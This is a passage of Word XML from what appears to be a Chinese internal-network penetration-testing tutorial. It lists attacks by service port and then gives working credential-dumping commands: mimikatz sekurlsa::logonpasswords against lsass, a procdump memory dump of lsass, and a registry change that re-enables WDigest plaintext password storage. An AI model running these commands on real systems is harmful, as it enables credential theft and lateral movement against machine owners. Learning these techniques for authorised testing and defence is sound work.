              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>端口说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>使用说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="108" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="108" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>53</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>DNS域名系统</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>允许区域传送、DNS劫持、缓存投毒、欺骗</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="108" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="108" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>67、68</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>DHCP服务</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>劫持、欺骗</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="108" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="108" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>161</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>SNMP协议</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>爆破、搜集目标内网信息</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>特殊服务端口</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="29"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="autofit"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="108" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="108" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1893"/>
        <w:gridCol w:w="2868"/>
        <w:gridCol w:w="2638"/>
      </w:tblGrid>
      <w:tr>
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="108" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="108" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>端口号</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>端口说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>使用说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="108" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="108" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>2181</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>ZooKeeper服务</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>未授权访问</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="108" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="108" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>8069</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Zabbix服务</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>远程执行、SQL注入</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="108" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="108" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>9200、9300</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Elasticsearch服务</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>远程执行</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="108" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="108" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>11211</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Mencached服务</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>未授权访问</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="108" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="108" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>512、513、514</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Linux rexec服务</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>爆破、远程登录</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="108" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="108" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>873</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Rsync服务</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>匿名访问、文件上传</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="108" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="108" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>3690</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>SVN服务</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>SVN泄露、未授权访问</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="108" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="108" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>50000</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>SAP Management Console</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>远程执行</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="44"/>
      <w:bookmarkEnd w:id="48"/>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
      </w:pPr>
      <w:bookmarkStart w:id="49" w:name="X93def12aa7706e5660b38dd7238a4888d7f51fe"/>
      <w:r>
        <w:t>4、用户凭据收集</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="24"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> 在内网渗透中，当测试人员获取某台机器的控制权后，会以被攻陷的主机为跳板进行横向渗透，进一步扩大所掌握的资源范围，但横向渗透中的很多地方都需要先获取到域内用户的密码或哈希值才能进行。如哈希传递攻击，票据传递攻击等。所以在进行信息搜集时，要尽可能收集用户的登录凭据等信息。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="7"/>
      </w:pPr>
      <w:bookmarkStart w:id="50" w:name="Xcb4723ab09aaac0e0ec7c78647d9a2f5f7e7250"/>
      <w:r>
        <w:t>(1)、获取域内单机密码和哈希值</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="24"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> 在Windows中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>SAM</w:t>
      </w:r>
      <w:r>
        <w:t>文件是Windows用户的账户数据库，位于系统的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>%SystemRoot%\System32\Config</w:t>
      </w:r>
      <w:r>
        <w:t>目录中，所有本地用户的用户名、密码哈希值等信息都存储在这个文件中。用户输入密码登录时，用户输入的明文密码被转换成哈希值，然后和SAM文件中的哈希值对比，若相同，则认证成功。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="24"/>
        <w:ind w:firstLine="220" w:firstLineChars="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>lsass.exe</w:t>
      </w:r>
      <w:r>
        <w:t>是windows的一个系统进程，用于实现系统的安全机制，主要用于本地安全和登录策略。在通常情况下，用户输入账号密码后，登录的域名、用户名和登录凭据等信息会储存在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>lsass.exe</w:t>
      </w:r>
      <w:r>
        <w:t>进程空间中，用户的明文密码经过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>WDigest</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>Tspkg</w:t>
      </w:r>
      <w:r>
        <w:t>模块调用后，会对其使用可逆的算法进行加密并存储在内存中。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> 用来获取主机的用户密码和哈希值的工具有很多，这些工具大多是通过读取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>SAM</w:t>
      </w:r>
      <w:r>
        <w:t>文件或访问</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>lsass.exe</w:t>
      </w:r>
      <w:r>
        <w:t>进程的内存数据等操作实现的。这些操作大多需要管理员权限，这意味着需要配合一些提权操作。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> 下面主要通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>Mimikatz</w:t>
      </w:r>
      <w:r>
        <w:t>工具来演示几种获取用户凭据的方法。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>Mimikatz</w:t>
      </w:r>
      <w:r>
        <w:t>是一款功能强大的凭据转储开源程序，可以帮助测试人员提升进程权限、注入进程、读取进程内存等。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="51" w:name="a在线读取lsass进程内存"/>
      <w:r>
        <w:t>(a)、在线读取lsass进程内存</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>以管理员权限运行cmd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="24"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> 将</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://github.com/ParrotSec/mimikatz" \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
        </w:rPr>
        <w:t>mimikatz.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>上传到目标主机，并执行以下命令，可直接从</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>lsass.exe</w:t>
      </w:r>
      <w:r>
        <w:t>进程的内存中读取当前已登录用户的凭据。需要System权限以及免杀。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>mimikatz.exe "privilege::debug"  "sekurlsa::logonpasswords full" exit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>// privilege::debug，用于提升至DebugOrivilege权限；sekurlsa::logonpasswords，用于导出用户凭据</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5486400" cy="1692275"/>
            <wp:effectExtent l="0" t="0" r="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486400" cy="1692275"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5485130" cy="1471295"/>
            <wp:effectExtent l="0" t="0" r="127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5485130" cy="1471295"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="51"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="8"/>
      </w:pPr>
      <w:bookmarkStart w:id="52" w:name="b离线读取lsass内存文件"/>
      <w:r>
        <w:t>(b)、离线读取lsass内存文件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="24"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> 将内存文件导出到本地后，使用Mimikatz离线读取。用于转储进程内存的工具很多，如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>OutMinidump.ps1、Porcdump、SharpDump</w:t>
      </w:r>
      <w:r>
        <w:t>等，这里我们使用微软官方提供的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>Porcdump</w:t>
      </w:r>
      <w:r>
        <w:t>工具。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> 将</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://learn.microsoft.com/en-us/sysinternals/downloads/procdump" \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
        </w:rPr>
        <w:t>Procdump</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>上传到目标机</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>以管理员运行cmd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>procdump.exe -accepteula -ma lsass.exe lsass.dmp</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5485765" cy="112458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485765" cy="1124585"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5481955" cy="1634490"/>
            <wp:effectExtent l="0" t="0" r="44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481955" cy="1634490"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>mimikatz.exe "sekurlsa::minidump lsass</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>-1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>.dmp"  "sekurlsa::logonpasswords full" exit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">   #</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>sekurlsa::minidumo lsass</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>-1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>.dmp，用于加载内存文件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="24"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5476875" cy="2773045"/>
            <wp:effectExtent l="0" t="0" r="952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476875" cy="2773045"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="52"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="8"/>
      </w:pPr>
      <w:bookmarkStart w:id="53" w:name="X1b5328e9ff6f3f5f2759e2fe1fa32b7a0520cbf"/>
      <w:r>
        <w:t>(c)、为了防止用户的明文密码在内存中泄露，微软在2014年5月发布了KB2871997补丁，关闭了WDigest功能，禁止从内存中获取明文密码，且windows2012及以上版本默认关闭WDigest功能。但可以通过修改注册表重新开启WDigest功能。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="24"/>
      </w:pPr>
      <w:r>
        <w:t>Server 08 及之前的版本可以直接通过以上方式抓明文密码，Server 2012及以上抓取明文密码需要</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>手工修改注册表 + 强制锁屏 + 等待目标系统管理员重新登录+导出Hash+本地mimikatz抓明文</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>#修改注册表来让Wdigest Auth保存明文口令</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>#恢复</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
